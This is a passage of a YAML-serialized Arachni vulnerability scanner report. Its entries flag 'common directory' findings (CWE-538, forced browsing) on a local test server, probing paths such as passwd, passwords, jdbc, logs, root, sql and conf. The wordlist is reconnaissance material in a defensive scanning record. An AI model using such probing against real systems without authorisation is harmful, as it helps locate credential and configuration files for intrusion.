    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: passwd
    injected: passwd
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: passwd
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/passwd/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/passwords/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: passwords
    injected: passwords
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: passwords
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/passwords/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/password/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: password
    injected: password
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: password
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/password/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/jdbc/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: jdbc
    injected: jdbc
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: jdbc
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/jdbc/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/files/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: files
    injected: files
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: files
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/files/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/site/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: site
    injected: site
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: site
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/site/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/sales/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: sales
    injected: sales
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: sales
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/sales/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/log/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: log
    injected: log
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: log
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/log/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/logs/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: logs
    injected: logs
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: logs
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/logs/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/login/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: login
    injected: login
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: login
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/login/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/logon/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: logon
    injected: logon
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: logon
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/logon/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/logfile/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: logfile
    injected: logfile
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: logfile
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/logfile/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/guests/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: guests
    injected: guests
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: guests
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/guests/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/root/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root
    injected: root
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: root
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/root/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/htdocs/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: htdocs
    injected: htdocs
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: htdocs
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/htdocs/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/account/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: account
    injected: account
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: account
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/account/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/sql/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: sql
    injected: sql
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: sql
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/sql/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/file/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: file
    injected: file
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: file
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/file/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/setup/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: setup
    injected: setup
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: setup
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/setup/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/website/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: website
    injected: website
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: website
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/website/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/conf/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: conf
    injected: conf
